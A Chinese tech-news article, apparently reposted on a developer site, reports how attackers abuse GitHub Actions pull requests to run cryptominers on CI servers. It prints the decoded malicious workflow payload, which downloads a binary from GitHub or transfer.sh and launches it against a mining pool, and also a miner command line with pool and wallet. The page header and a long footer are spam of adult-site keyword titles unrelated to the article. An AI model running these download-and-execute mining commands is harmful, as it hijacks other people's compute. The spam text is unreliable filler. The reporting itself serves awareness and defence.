精品欧美一区二区三区在线观看 _久久久久国色av免费观看性色_国产精品久久在线观看_亚洲第一综合网站_91精品又粗又猛又爽_小泽玛利亚一区二区免费_91亚洲精品国偷拍自产在线观看 _久久精品视频在线播放_美女精品久久久_欧美日韩国产成人在线

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

新聞 黑客攻防
黑客們動起了歪心思——“白嫖”服務(wù)器。給PC植入挖礦木馬,已經(jīng)無法滿足黑客日益增長的算力需求,如果能用上GitHub的服務(wù)器,還不花錢,那當然是極好的。

 

本文經(jīng)AI新媒體量子位(公眾號ID:QbitAI)授權(quán)轉(zhuǎn)載,轉(zhuǎn)載請聯(lián)系出處。

加密貨幣價格一路高漲,顯卡又買不起,怎么才能“廉價”挖礦?

黑客們動起了歪心思——“白嫖”服務(wù)器。

給PC植入挖礦木馬,已經(jīng)無法滿足黑客日益增長的算力需求,如果能用上GitHub的服務(wù)器,還不花錢,那當然是極好的。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

而且整個過程可能比侵入PC還容易,甚至都不需要程序員上當受騙。只需提交Pull Request(PR),即使項目管理者沒有批準,惡意挖礦代碼依然能夠執(zhí)行。

原理也很簡單,利用GitHub Action的自動執(zhí)行工作流功能,輕松將挖礦程序運行在GitHub的服務(wù)器上。

早在去年11月,就已經(jīng)有人發(fā)現(xiàn)黑客這種行為。更可怕的是,半年過去了,這種現(xiàn)象依然沒得到有效制止。

GitHub心里苦啊,雖然可以封禁違規(guī)賬號,但黑客們玩起了“游擊戰(zhàn)術(shù)”,不斷更換馬甲號逃避“追捕”,讓官方疲于奔命。

就在幾天前,一位荷蘭的程序員還發(fā)現(xiàn),這種攻擊方式依然存在,甚至代碼里還出現(xiàn)了中文。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

那么,這些黑客是如何植入挖礦程序的呢?一切要從發(fā)現(xiàn)異常的法國程序員Tib說起。

PR異常讓程序員起疑心

去年11月,Tib發(fā)現(xiàn),自己在一個沒有參加的repo上收到了PR請求。而且在14個小時內(nèi)就收到了7個,全是來自一個“y4ndexhater1”的用戶,沒有任何描述內(nèi)容。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

令人感到奇怪的是,這并不是一個熱門項目,Star數(shù)量為0。

[[392450]]

打開項目主頁發(fā)現(xiàn),內(nèi)容是Perl項目的github action、circle ci、travis-ci示例代碼集合,整個README文檔一團糟,根本不像一個正經(jīng)的開源項目。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

然而就是這個混亂又冷門的repo,居然在3天里被fork了2次。

一切都太不正常了,讓人嗅到了一絲不安的氣息。

嘗試“作死”運行

本著“作死”的精神,Tib決定一探究竟。

經(jīng)過那位可疑用戶的操作,Tib所有的action都被刪除,在工作流里被加入了一個ci.yml文件,內(nèi)容如下:

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

當Tib看到eval “$(echo “YXB0IHVwZGF0ZSAt這一行內(nèi)容后,立刻從沙發(fā)上跳了起來,他意識到事情的嚴重性:有人在入侵他的GitHub個人資料!

這串看似神秘的字符,其實是base64編碼,經(jīng)過翻譯后,得到了另一段代碼:

apt update -qq
apt install -y curl git jq
curl -Lfo prog https://github.com/bhriscarnatt/first-repo/releases/download/a/prog || curl -Lfo prog https://transfer.sh/OSPjK/prog
ip=$(curl -s -H 'accept: application/dns-json' 'https://dns.google/resolve?name=poolio.magratmail.xyz&type=A' | jq -r '.Answer[0].data')
chmod u+x prog
timeout 4h ./prog -o "${ip}:3000" -u ChrisBarnatt -p ExplainingComputers --cpu-priority 5 > /dev/null

前面兩行不必解釋,有意思的地方從第三行開始,它會下載一個prog二進制文件。

為了安全起見,Tib先嘗試獲取信息而不是執(zhí)行,得到了它的十六進制代碼。

$ objdump -s --section .comment prog
prog: file format elf64-x86-64
Contents of section .comment:
0000 4743433a 2028416c 70696e65 2031302e GCC: (Alpine 10.
0010 322e315f 70726531 29203130 2e322e31 2.1_pre1) 10.2.1
0020 20323032 30313230 3300 20201203.

Tib也考慮過反編譯,但是沒有成功。

不入虎穴,焉得虎子,Tib決定嘗試運行一下。

要執(zhí)行這一大膽而又作死的任務(wù),防止“試試就逝世”,Tib首先斷開了電腦的網(wǎng)絡(luò)鏈接,并選擇在Docker容器中運行。

答案終于揭曉,原來這個prog是一個名為XMRig的挖礦程序。

$ ./prog --version
XMRig 6.8.1
built on Feb 3 2021 with GCC 10.2.1
features: 64-bit AES
libuv/1.40.0
OpenSSL/1.1.1i
hwloc/2.4.0

當時XMRig的最新版恰好是6.8.1,和上面的版本參數(shù)符合。不過用SHA256檢測后發(fā)現(xiàn),這個prog并不完全是XMRig,Tib預(yù)測它可能是一個修改版。

實際上,可能被攻擊的不止GitHub,安全公司Aqua推測,像Docker Hub、Travis CI、Circle CI這些SaaS軟件開發(fā)環(huán)境,都可能遭受這類攻擊。

在這個攻擊過程中,會派生一個合法的repo,負責將惡意的GitHub Action添加到原始代碼。然后,黑客再向原始repo提交一個PR,將代碼合并回原始repo。

下載的挖礦程序會偽裝成prog或者gcc編譯器,通過提交PR在項目執(zhí)行自動化工作流。此時服務(wù)器將運行偽裝后的挖礦程序。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

這些攻擊者僅一次攻擊就可以運行多達100個挖礦程序,從而給GitHub的服務(wù)器帶來了巨大的計算量。

據(jù)Aqua估計,僅在三天的時間里,挖礦黑客就在GitHub上有超過2.33萬次commit、在Docker Hub上5.8萬次build,轉(zhuǎn)化了大約3萬個挖礦任務(wù)。

可以防范但很難根除

這種攻擊甚至不需要被攻擊的倉庫管理者接受惡意Pull Request。

只要在.github/workflows目錄里面的任意.yml文件中配置了在收到Pull Request時執(zhí)行,來自黑客的Action就會自動被執(zhí)行。

如果你沒有使用這個功能,那就不用擔心啦,黑客大概也不會找上你。

需要用到這個功能的話,可以設(shè)置成只允許本地Action或只允許Github官方及特定作者創(chuàng)建的Action。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

將情況反饋給客服后,GitHub會對惡意賬號進行封號和關(guān)閉相關(guān)Pull Request的操作。

但惡意攻擊很難被根除,黑客只需要注冊新的賬號就可以繼續(xù)白嫖服務(wù)器資源。

攻擊還在繼續(xù)

我們從最近一次攻擊中發(fā)現(xiàn),黑客將挖礦程序上傳到GitLab并偽裝成包管理工具npm。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

打開這個可疑的nani.bat,可以看到:

npm.exe --algorithm argon2id_chukwa2
--pool turtlecoin.herominers.com:10380
--wallet TRTLv3ZvhUDDzXp9RGSVKXcMvrPyV5yCpHxkDN2JRErv43xyNe5bHBaFHUogYVc58H1Td7vodta2fa43Au59Bp9qMNVrfaNwjWP
--password xo

這一次黑客挖的是烏龜幣*(TurtleCoin)*,可使用CPU計算。按當前價格挖出四千多個幣才值1美元。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

Github Actions的免費服務(wù)器可以提供英特爾E5 2673v4的兩個核心,7GB內(nèi)存。

大致估算單臺運行一天只能獲利幾美分,而且黑客的挖礦程序通常只能在被發(fā)現(xiàn)之前運行幾個小時。比如Docker Hub就把自動build的運行時間限制在2個小時。

不過蚊子再小也是肉,黑客通過尋找更多接受公開Action的倉庫以及反復(fù)打開關(guān)閉Pull Request就能執(zhí)行更多的挖礦程序。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

△同一黑客賬號至少攻擊了95個GitHub倉庫

正如Twitter用戶Dave Walker所說的,如果你提供免費的計算資源,就要做好會被攻擊和濫用的覺悟。挖礦有利可圖的情況下這是不可避免的。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

據(jù)報道,受害的不止GitHub,還有Docker Hub、Travis CI以及Circle CI等提供類似服務(wù)的持續(xù)集成平臺。

這一亂象不知何時才能結(jié)束,唯一的好消息可能就是,挖礦的黑客似乎只是針對GitHub提供的服務(wù)器資源,而不會破壞你的代碼。

但是GitHub Action的漏洞不止這一個。還有方法能使黑客讀寫開發(fā)者的倉庫,甚至可以讀取加密的機密文件。

黑客用GitHub服務(wù)器挖礦,三天跑了3萬個任務(wù),代碼驚現(xiàn)中文

去年7月,Google Project Zero團隊就已向GitHub通報漏洞。但在給出的90天修復(fù)期限+延長14天后,GitHub仍未能有效解決。

對此,我們的建議是,不要輕易相信GitHub市場里的Action作者,不要交出你的密匙。

 

 

責任編輯:張燕妮 來源: 量子位
相關(guān)推薦

2021-04-20 09:36:49

黑客網(wǎng)絡(luò)安全網(wǎng)絡(luò)攻擊

2009-09-01 13:34:08

IIS0dayWindows

2012-12-14 10:00:06

2023-09-12 14:40:41

2021-03-08 10:00:54

黑客電子郵件網(wǎng)絡(luò)攻擊

2021-04-27 19:23:47

服務(wù)器工具redis

2010-05-12 16:38:09

2022-04-24 14:11:26

病毒僵尸網(wǎng)絡(luò)網(wǎng)絡(luò)攻擊

2009-03-30 12:32:28

2013-09-04 10:01:15

2025-11-21 12:00:00

終端安全漏洞黑客

2021-03-12 09:50:08

曙光

2009-03-09 17:30:00

2016-02-26 15:37:05

2011-07-05 13:40:29

刀片服務(wù)器戴爾

2020-03-16 14:39:44

服務(wù)器開發(fā)工具

2025-07-08 09:02:23

2021-10-24 08:24:34

WinRAR遠程代碼漏洞

2015-01-04 09:22:58

2013-03-26 11:11:38

Windows Blu文件管理器
點贊
收藏

51CTO技術(shù)棧公眾號

亚洲人辣妹窥探嘘嘘| 国产欧美精品日韩| 五月开心播播网| 亚洲欧美一区二区三区| 国产精品久久久久影院| 国产精品久久一区二区三区| www.色国产| 91精品国产91久久久久久密臀| 精品国产乱码久久久久久久久| 可以免费观看av毛片| 18视频在线观看网站| 久久久久久久综合日本| 亚洲qvod图片区电影| 五月婷婷中文字幕| 天天做天天爱天天爽综合网| 日韩精品在线观看一区| 四川一级毛毛片| 欧美日韩国产网站| 天天亚洲美女在线视频| 中文字幕在线乱| 九色在线免费| va亚洲va日韩不卡在线观看| 91精品在线播放| 销魂美女一区二区| 亚洲激情网址| 欧美肥臀大乳一区二区免费视频| 国产又粗又长又硬| 伊人春色之综合网| 亚洲精品成人免费| 成人在线观看一区二区| 精品入口麻豆88视频| 欧美午夜电影网| 久久国产成人精品国产成人亚洲| 欧美wwww| 亚洲综合成人网| 午夜啪啪福利视频| 日本激情在线观看| 中文子幕无线码一区tr| 欧美日韩最好看的视频| 色视频在线观看| av亚洲精华国产精华精华 | 午夜老司机精品| 神宫寺奈绪一区二区三区| 国产91精品露脸国语对白| 91黄色精品| 国产日韩欧美视频在线观看| 看片的网站亚洲| 国产精品永久免费| 最近日韩免费视频| 蜜臀精品久久久久久蜜臀| 国产精品成av人在线视午夜片| 亚洲成人av影片| 久久这里有精品15一区二区三区| 欧美一级视频免费在线观看| 精品国产午夜福利| 久久视频一区| 国产精品日韩精品| 一区二区国产欧美| 国产一区二区久久| 666精品在线| 亚洲美女性生活| 国产·精品毛片| 精品乱码一区二区三区| 男同在线观看| 日本一二三四高清不卡| aaa免费在线观看| 国产在线观看a| 亚洲国产精品影院| 自慰无码一区二区三区| 日韩欧美看国产| 欧美日韩精品二区第二页| 老司机久久精品| 一本色道69色精品综合久久| 亚洲精品不卡在线| 日本一道本视频| 偷偷www综合久久久久久久| 欧美高清电影在线看| 久草国产精品视频| 日韩精品电影在线| 91中文字幕一区| 欧美特级特黄aaaaaa在线看| 久久久电影一区二区三区| 亚洲精品中文字幕在线| 欧美6一10sex性hd| 在线观看亚洲精品视频| 久久精品国产99久久99久久久| 成人台湾亚洲精品一区二区 | 成人午夜小视频| 成人精品在线播放| 久久精品人人爽人人爽| 亚洲小视频在线播放| 涩涩视频在线| 在线播放欧美女士性生活| 亚洲一区二区三区四区av| 欧美理论在线播放| 久久久久久久999精品视频| 国产亚洲欧美日韩高清| 丰满少妇久久久久久久| 午夜免费电影一区在线观看| 97蜜桃久久| 在线播放日韩导航| 久久久久亚洲av无码专区桃色| 欧美国产小视频| 5566日本婷婷色中文字幕97| 国产美女三级无套内谢| 久久久综合激的五月天| 自拍另类欧美| 午夜精品成人av| 日韩精品在线一区| 成年人网站在线观看视频| 亚洲深夜影院| 国产不卡一区二区在线观看| 免费网站黄在线观看| 亚洲永久无码7777kkk| 国产综合精品在线| 久久久精品区| 国产亚洲视频在线| 国产特黄大片aaaa毛片| 国产一区二区三区精品视频| 日日夜夜精品网站| 亚洲小少妇裸体bbw| 欧美成人官网二区| 成年人av电影| 黄页网站大全一区二区| 亚洲高清在线观看一区| 成人性生活视频| 亚洲国产精品小视频| 青青草手机在线观看| 久久精品99久久久| 婷婷四月色综合| 成人影院大全| 亚洲人成毛片在线播放| 中文字幕在线观看视频网站| av电影在线观看不卡| 欧美国产视频一区| 91麻豆精品激情在线观看最新 | 成人影院在线看| 欧美亚洲高清一区二区三区不卡| 巨胸大乳www视频免费观看| 亚洲片区在线| 国产精品免费在线| 国产三线在线| 亚洲精品www久久久| 国产精品美女久久久久av爽| 99re免费视频精品全部| 国产黄视频在线| 亚洲福利网站| 国产精品成人免费视频| 国产香蕉在线| 欧美日韩亚洲另类| 99精品中文字幕| 国产美女精品在线| 黄色成人在线免费观看| 99精品中文字幕在线不卡| 国产综合在线看| 亚洲av成人无码久久精品老人 | 一区二区三区欧美精品| 一区二区中文| 国产精品一区二区免费看| 青春草免费在线视频| 亚洲国产欧美自拍| 日本免费在线观看视频| 国产农村妇女精品| 五月婷婷之婷婷| 黄色欧美成人| 日本精品二区| 国产精品视频一区二区三区| 欧美激情va永久在线播放| 婷婷五月综合久久中文字幕| 日韩欧美在线一区| 青青青视频在线免费观看| 国产精品自拍一区| 1024av视频| 日韩情爱电影在线观看| 91在线观看免费观看 | 国产精品天天狠天天看| 乱人伦中文视频在线| 亚洲成人aaa| 波多野结衣激情视频| 亚洲色图欧洲色图| 制服丝袜第二页| 久久精品国产成人一区二区三区| 成人在线免费高清视频| 亚洲va久久| 91精品在线一区| yellow在线观看网址| 国产亚洲精品va在线观看| 国产v在线观看| 一本久道久久综合中文字幕| 青青操在线视频观看| 97久久久精品综合88久久| 五月婷婷六月丁香激情| 亚洲茄子视频| 黄频视频在线观看| 日韩成人午夜| 亚洲综合av影视| 日本精品不卡| 欧美激情精品久久久久久变态| 国产在线色视频| 精品少妇一区二区三区| 伊人网免费视频| 富二代精品短视频| 欧美毛片在线观看| 国产精品国产自产拍高清av | 精品日韩毛片| 国产精品中出一区二区三区| 日韩电影免费观看高清完整版在线观看| 久久久久久久久电影| 久久五月精品| 伊人久久免费视频| 午夜视频福利在线观看| 日韩精品一区二区三区视频在线观看 | 欧美激情自拍| 一区不卡视频| 精品国产一区二区三区| 精品一区二区日本| 亚洲视频精选| 亚洲永久免费观看| 先锋影音网一区二区| 国产精品第10页| 亚洲精品日产| 91国偷自产一区二区三区的观看方式| 91麻豆免费在线视频| 三级精品视频久久久久| 精品影院一区| 亚洲免费电影在线观看| 农村少妇久久久久久久| 欧美一区二区高清| 国产又粗又黄又爽| 欧美日韩黄色影视| 亚洲精品国产精品国自产网站按摩| 一本大道久久a久久精品综合| 国产成人啪精品午夜在线观看| 亚洲综合色噜噜狠狠| 青青草免费av| 亚洲一区二区五区| 精品午夜福利视频| 一区二区三区 在线观看视频| 国精品无码一区二区三区| 亚洲欧洲日韩女同| 四虎精品免费视频| 亚洲色图一区二区| 在线观看成人毛片| 亚洲一区在线播放| 国产无码精品久久久| 午夜电影久久久| 精品国产免费观看| 色综合久久中文综合久久97| 亚洲天堂男人av| 欧美午夜精品一区| 国产精品九九九九| 日韩欧美一区二区在线视频| 黄色福利在线观看| 亚洲免费电影一区| 999在线视频| 美女精品久久久| 日本高清成人vr专区| 久久久久久久久久国产精品| zzzwww在线看片免费| 日本成人精品在线| 日韩av电影资源网| 成人精品一区二区三区电影黑人| 九九九九九九精品任你躁| 国产91精品一区二区绿帽| 日韩极品少妇| 无码免费一区二区三区免费播放 | 欧美黑人又粗又大又爽免费| 裸体在线国模精品偷拍| 欧美一区二区三区影院| 91免费视频大全| 亚洲女同二女同志奶水| 一区二区三区日韩精品| 久久99国产综合精品免费| 欧美在线制服丝袜| www日本在线| 亚洲精品中文字幕av| 免费在线看黄网站| 国自在线精品视频| 日韩在线观看不卡| 成人片在线免费看| 精品国产欧美日韩| 国产高清不卡无码视频| 老司机一区二区三区| 福利视频999| 久久综合资源网| 小泽玛利亚一区| 福利精品视频在线| aaa一区二区三区| 亚洲精品在线观看www| 在线观看三级视频| 国产精彩精品视频| www.久久东京| 日韩精品久久一区| 在线电影一区二区| 欧美少妇性生活视频| 国产精品18久久久久| 免费看91的网站| 亚洲大片精品永久免费| 亚洲一区二区色| 精品视频一区在线视频| 亚洲wwwww| 国产精品一区二区久久国产| 九九热播视频在线精品6| 国产精品无码乱伦| 日韩精品五月天| 人妻 日韩 欧美 综合 制服| 亚洲色图制服丝袜| 少妇无套内谢久久久久| 日韩av中文字幕在线播放| caoporm免费视频在线| 国产精品自产拍在线观看| 老司机成人在线| 国产一区二区三区播放| 九一九一国产精品| 亚洲精品91在线| 好吊成人免视频| 亚州精品国产精品乱码不99按摩| 欧美成年人视频| 国产日本亚洲| 一区二区三区久久网| 蜜桃视频在线一区| 女人又爽又黄免费女仆| 精品久久久久久久久久久久久久| 午夜精品久久久久久久第一页按摩 | 色偷偷久久人人79超碰人人澡 | 原创国产精品91| 爱情电影社保片一区| 精品欧美一区二区久久久伦| 雨宫琴音一区二区在线| 国产吃瓜黑料一区二区| 一区二区在线观看免费| 国产免费一区二区三区最新不卡| www.精品av.com| 亚洲高清影院| 天堂v在线视频| 国产一区二区剧情av在线| √天堂中文官网8在线| 欧美二区乱c少妇| 黄色免费在线网站| 91精品在线观| 欧美日韩国产综合网| 国产成人精品一区二区在线小狼 | 久久激情五月丁香伊人| 国产日本久久| 国产日韩视频在线播放| 国产一区二区精品久久99| 欧美人妻一区二区| 亚洲丁香婷深爱综合| jizzjizz中国精品麻豆| 精品国产一二| 美女尤物久久精品| av网在线播放| 欧美日韩激情在线| 97超碰在线公开在线看免费| 91九色在线观看| 在线亚洲激情| 国产毛片久久久久久久| 欧美日韩精品一区二区三区 | 男人天堂一区二区| 欧美专区在线视频| 区一区二视频| ass极品水嫩小美女ass| 亚洲成年人影院| 久久久久久女乱国产| 国产精品专区一| 欧美日韩网址| 欧美肉大捧一进一出免费视频| 色综合久久久久综合99| 最新97超碰在线| 不卡一区二区三区视频| 国产一级久久| 日本伦理一区二区三区| 精品日韩一区二区三区免费视频| 理论片午夜视频在线观看| 亚洲国产成人不卡| 国产成人综合亚洲网站| 一本一道无码中文字幕精品热| 日韩在线小视频| 噜噜噜狠狠夜夜躁精品仙踪林| 国产又猛又黄的视频| 亚洲精品视频在线观看免费| 亚洲欧美一区二区三| 成人精品视频99在线观看免费| 99精品国产在热久久婷婷| 后入内射无码人妻一区| 亚洲国产精品悠悠久久琪琪| 日本欧美在线| 日韩av在线第一页| 亚洲欧美日韩在线| 看电影就来5566av视频在线播放| 亚洲一区精品电影| 日韩成人精品在线观看| 久久精品国产亚洲AV无码麻豆| 最近中文字幕日韩精品| 国产精品chinese在线观看| 亚洲国产成人va在线观看麻豆| 亚洲五月六月丁香激情| 91精彩视频在线观看| 久久国产精品免费一区| 国产一区二区三区精品视频|